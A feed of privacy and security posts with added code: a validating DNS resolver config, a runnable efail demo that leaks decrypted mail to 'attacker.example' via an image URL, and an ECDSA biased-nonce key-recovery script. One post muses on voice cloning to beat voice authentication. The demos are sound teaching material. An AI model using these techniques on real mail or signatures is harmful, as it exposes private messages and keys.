On behalf of the #privacy community that has long been saying that #SurveillanceCapitalism is fundamentally incompatible with democracy and a graver national security threat than terrorism, I'd like to say:
We fucking told you so!
#Russian influence campaigns
#CambridgeAnalytica
#Mercer family / #Bannon culture wars
Today's BGP hijack of Cloudflare's 1.1.1.1 DNS service to an AS in China demonstrates how using a centralized DNS service is dangerous.
Running a recursive resolver, preferably with DNSSEC validation and enforcement, should help mitigate issues like what happened this morning.
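As an added example (not from the toot above): a minimal unbound configuration for the local validating recursive resolver the toot recommends. The listen address, the trust-anchor path and the access-control ranges are assumptions for a single-host setup; adjust them for your network.

```conf
# /etc/unbound/unbound.conf (assumed path) -- local validating recursive resolver
server:
    interface: 127.0.0.1
    access-control: 127.0.0.0/8 allow
    access-control: 0.0.0.0/0 refuse

    # Recurse from the root servers ourselves. Deliberately no forward-zone:
    # there is no single upstream (1.1.1.1, 8.8.8.8, ...) whose route can be hijacked.

    # DNSSEC validation: the root trust anchor is kept current via RFC 5011.
    # Seed the file once with: unbound-anchor -a /var/lib/unbound/root.key
    auto-trust-anchor-file: "/var/lib/unbound/root.key"
    val-permissive-mode: no          # bogus answers become SERVFAIL, never passed through
    harden-dnssec-stripped: yes      # reject unsigned answers for zones known to be signed
    harden-glue: yes
    qname-minimisation: yes          # send as little of the query name upstream as possible

    hide-identity: yes
    hide-version: yes
```

Check it with `unbound-checkconf`, then `dig @127.0.0.1 +dnssec example.com` (the `ad` flag should be set) and `dig @127.0.0.1 www.dnssec-failed.org` (a deliberately broken test zone; a validating resolver answers SERVFAIL). Caveat: validation only protects zones that are actually signed; for unsigned zones a hijacked path to the authoritative servers can still return forged data.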
Catching up on #security news.
#efail, #throwhammer, more #spectre, #electron vulnerabilities... Everything is as terrible as I remember.
#efail attack to decrypt and exfiltrate pgp or s/mime encrypted email is pretty hilarious.
Intercept an encrypted email and modify the email to add an HTML image URL directed to your malicious domain. Leave the image tag open (without closing the quotes), paste in the encrypted email, and then close the image tag. Most clients will decrypt the text and query the malicious domain looking for an image matching the decrypted text.
This is why we encrypt and authenticate, kids.
efail.de
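The rewrap-and-render sequence described in the toot above, as an added example; this is not the toot author's code and not from efail.de. `toy_encrypt`/`toy_decrypt` are stand-ins for the real OpenPGP/S-MIME layer (the attack never modifies the ciphertext, so any cipher shows it), `attacker.example` is an assumed attacker host, and the real PGP/MIME nesting (`multipart/encrypted`) is flattened to one `application/octet-stream` part for brevity. The vulnerable client splices every decrypted part into one HTML document and loads remote images; the hardened client renders each part in isolation and fetches nothing unless told to.

```python
import base64
from email import message_from_bytes
from html.parser import HTMLParser

# Constructed sample: the plaintext the sender encrypted. Any real secret works the same.
SECRET = "Wire code 7741-ALPHA, do not forward."
ATTACKER = "http://attacker.example/exfil?leak="   # assumed attacker-controlled host


def toy_encrypt(plaintext):
    """Stand-in for the OpenPGP/S-MIME layer (NOT real crypto). The attack never
    modifies the ciphertext, so any cipher with a matching toy_decrypt() shows it."""
    return plaintext.encode()[::-1]


def toy_decrypt(ciphertext):
    return ciphertext[::-1].decode()


def attacker_rewrap(ciphertext, boundary="efail"):
    """Rebuild the intercepted mail as multipart/mixed: an HTML part that opens an
    <img src="..."> attribute and leaves the quote open, the untouched ciphertext
    (flattened here to one application/octet-stream part; real PGP/MIME nests it
    in multipart/encrypted), and a closing part. Only the ciphertext is the sender's."""
    b64 = base64.b64encode(ciphertext).decode()
    return (
        "From: alice@example\r\nTo: bob@example\r\nSubject: Re: wire\r\n"
        "MIME-Version: 1.0\r\n"
        f'Content-Type: multipart/mixed; boundary="{boundary}"\r\n\r\n'
        f"--{boundary}\r\nContent-Type: text/html\r\n\r\n"
        f'<img src="{ATTACKER}\r\n'
        f"--{boundary}\r\nContent-Type: application/octet-stream\r\n"
        "Content-Transfer-Encoding: base64\r\n\r\n"
        f"{b64}\r\n"
        f"--{boundary}\r\nContent-Type: text/html\r\n\r\n"
        '">\r\n'
        f"--{boundary}--\r\n"
    ).encode()


def _decrypted_parts(raw, decrypt):
    """Walk the MIME tree, decrypting encrypted parts; returns each leaf part as text."""
    parts = []
    for part in message_from_bytes(raw).walk():
        if part.get_content_maintype() == "multipart":
            continue
        body = part.get_payload(decode=True)
        is_encrypted = part.get_content_type() == "application/octet-stream"
        parts.append(decrypt(body) if is_encrypted else body.decode())
    return parts


class _ImgSrcs(HTMLParser):
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.srcs.extend(v for k, v in attrs if k == "src" and v)


def _img_srcs(html):
    parser = _ImgSrcs()
    parser.feed(html)
    parser.close()
    return parser.srcs


def vulnerable_client(raw, decrypt=toy_decrypt):
    """Decrypts in place, concatenates every part into ONE HTML document and fetches
    remote images: the decrypted text lands inside the attacker's src="..." and is
    sent to the attacker as part of the URL. Returns the URLs that would be fetched."""
    return _img_srcs("".join(_decrypted_parts(raw, decrypt)))


def hardened_client(raw, decrypt=toy_decrypt, load_remote=False):
    """Renders each MIME part as its own document, so decrypted text can never
    complete a tag opened in a different (attacker-supplied) part, and does not
    fetch remote content unless the user opts in. Returns the URLs it would fetch."""
    fetches = []
    for text in _decrypted_parts(raw, decrypt):
        if load_remote:
            fetches.extend(_img_srcs(text))
    return fetches


if __name__ == "__main__":
    mail = attacker_rewrap(toy_encrypt(SECRET))
    print("vulnerable client fetches:", vulnerable_client(mail))
    print("hardened client fetches:", hardened_client(mail, load_remote=True))
```

Note that the hardened client leaks nothing even with remote loading switched on: the unterminated `<img src="` in the attacker's part never becomes a complete tag because the decrypted text is rendered in a separate document. Blocking remote content is the second, independent line of defence.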
Apparently declaring #privacy to be dead, just because your business model requires it, does not make it so.
Some things are only born posthumously.
RT @tqbf@birdsite.link
Presenting Cryptopals Set 8 challenge 6: KEY RECOVERY ON BIASED ECDSA NONCES. https://toadstyle.org/cryptopals/76f2e314809b2a34ce9ff0d2a08f7a7f.txt
Every DSA signature needs a random nonce, but not every DSA signature truly has one. With even a _bias_ in the nonce, a little linear algebra recovers keys.
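As an added worked example (not the Cryptopals challenge text and not tqbf's code), the two-signature version of the biased-nonce attack on secp256k1, whose domain parameters are public constants. The private key, the two messages and the two nonces are constructed; both nonces are at most 64 bits, i.e. their top 192 bits are zero. With that much bias the hidden-number-problem lattice is only two-dimensional, so Gauss (Lagrange) reduction plus Babai rounding is the "little linear algebra" that recovers the key. Real-world biases of a few bits need many signatures and LLL/BKZ; the mechanics are the same.

```python
import hashlib

# secp256k1 domain parameters (public constants).
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)

# Constructed demo values: a signing key and two "random" nonces that are only
# 64 bits long, i.e. their top 192 bits are zero. That bias is what the attack uses.
PRIV = 0x2DEAD0BEEF1234567890ABCDEF0123456789ABCDEF0123456789ABCDEF012345
NONCES = (0xDEADBEEF00C0FFEE, 0x0123456789ABCDEF)
MSGS = (b"pay 1 BTC to alice", b"pay 1 BTC to bob")


def ec_add(a, b):
    """Affine point addition on y^2 = x^3 + 7 over GF(P); None is the point at infinity."""
    if a is None:
        return b
    if b is None:
        return a
    (x1, y1), (x2, y2) = a, b
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if a == b:
        lam = 3 * x1 * x1 * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P


def ec_mul(k, pt):
    """Double-and-add scalar multiplication (not constant time; demo only)."""
    acc = None
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return acc


def hash_int(msg):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % N


def ecdsa_sign(priv, msg, k):
    """Textbook ECDSA with a caller-supplied nonce k; returns (h, r, s)."""
    h = hash_int(msg)
    r = ec_mul(k, G)[0] % N
    s = pow(k, -1, N) * (h + priv * r) % N
    return h, r, s


def _rnd(num, den):
    """Nearest integer to num/den using exact integer arithmetic."""
    if den < 0:
        num, den = -num, -den
    return (2 * num + den) // (2 * den)


def _gauss_reduce(b1, b2):
    """Lagrange/Gauss reduction: returns a shortest basis of the 2-D lattice."""
    sq = lambda v: v[0] * v[0] + v[1] * v[1]
    while True:
        if sq(b2) < sq(b1):
            b1, b2 = b2, b1
        m = _rnd(b1[0] * b2[0] + b1[1] * b2[1], sq(b1))
        if m == 0:
            return b1, b2
        b2 = (b2[0] - m * b1[0], b2[1] - m * b1[1])


def _babai(b1, b2, t):
    """Babai rounding on a reduced basis: the lattice vector nearest to t."""
    det = b1[0] * b2[1] - b1[1] * b2[0]
    a = _rnd(t[0] * b2[1] - t[1] * b2[0], det)
    c = _rnd(b1[0] * t[1] - b1[1] * t[0], det)
    return a * b1[0] + c * b2[0], a * b1[1] + c * b2[1]


def recover_key(sig1, sig2):
    """Recover the private key x from two signatures whose nonces are both small.

    k_i = t_i*x + u_i (mod N) with t_i = r_i/s_i and u_i = h_i/s_i. Eliminating x gives
    k2 - A*k1 = C (mod N). The vector (k1, k2 - C) lies in the lattice spanned by
    (1, A) and (0, N) and is within ~2^64 of the target (0, -C), far closer than the
    ~2^128 minimum distance of that lattice, so a 2-D closest-vector search finds it.
    """
    (h1, r1, s1), (h2, r2, s2) = sig1, sig2
    t1, u1 = r1 * pow(s1, -1, N) % N, h1 * pow(s1, -1, N) % N
    t2, u2 = r2 * pow(s2, -1, N) % N, h2 * pow(s2, -1, N) % N
    A = t2 * pow(t1, -1, N) % N
    C = (u2 - A * u1) % N
    b1, b2 = _gauss_reduce((1, A), (0, N))
    k1 = _babai(b1, b2, (0, -C))[0]
    return (s1 * k1 - h1) * pow(r1, -1, N) % N


def demo():
    """Sign two messages with the biased nonces, then recover PRIV from the signatures alone."""
    sigs = [ecdsa_sign(PRIV, m, k) for m, k in zip(MSGS, NONCES)]
    return recover_key(*sigs)


if __name__ == "__main__":
    print("recovered key matches:", demo() == PRIV)
```

Requires Python 3.8+ for `pow(x, -1, m)`. The same derivation with nonces of full length gives a target no closer than any other lattice point, which is why an unbiased nonce is the whole security argument of (EC)DSA.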
Cryptocurrency hot take
Some great resources for redteamers https://medium.com/@adam.toscher/top-five-ways-the-red-team-breached-the-external-perimeter-262f99dc9d17 #redteam #pentest #offsec
roses are red
violets are blue
in surveillance capitalism
poem reads you
and shows you ads
for flower shops
and tracks your clicks
and never stops
it cares not about
if privacy's harmed
the money is green
when people are farmed
twitter is cyan
facebook is blue
your friends are the product
and so are you
Ohai!
I am toot. You click star, click boostybutton, author find out you exist. Might check you out.
Me bait, you fish.
Honest question for #infosec:
How practical is real-time voice synthesis (i.e. to reliably mimic a known target's voice and make it say what you want in a real conversation)? Assuming access to a large sample set (say a Skype scale dataset ;p), it seems like a much easier problem than real-time video fakes.
Anyway, it seems like there is an interesting class of exploits for such tech (from bypassing "your voice is your password" systems to social engineering).
I may do a patent search later.
US Politics
Wha?
#Guccifer 2.0 outed as a GRU officer after failing to activate VPN before logging in. Doh!
Most importantly, stop putting institutional events on Facebook, stop using it at universities, stop making participation in Facebook mandatory through your institutional, organization, and activist roles. You can be online, and social, and connected without supporting Facebook.
When online platforms over-censor, marginalized communities are often the first people silenced. We must stop FOSTA. https://act.eff.org/action/stop-fosta
The Internet lost a hero today. EFF is mourning the loss of our visionary co-founder, John Perry Barlow. https://www.eff.org/deeplinks/2018/02/john-perry-barlow-internet-pioneer-1947-2018
"In a new project, the RSA and DeepMind are creating space for citizens to consider trade-offs in the use of AI" (https://www.thersa.org/discover/publications-and-articles/rsa-blogs/2017/10/the-role-of-citizens-in-developing-ethical-ai)
Here's the letter I sent the RSA, both as a fellow and as someone who has presented an RSA talk on the subject, on how their partnership with Google/DeepMind/Alphabet, Inc. and this framing legitimises the false dichotomy at the heart of #SurveillanceCapitalism that there is a necessary tradeoff between modern technology and #privacy. https://mastodon.ar.al/media/DLpOYZB7IQpDYnzTq1U
"Weasels and liars never hold the field"
A good day to show your support for the #FBI which, despite its many faults, remains an institution of integrity.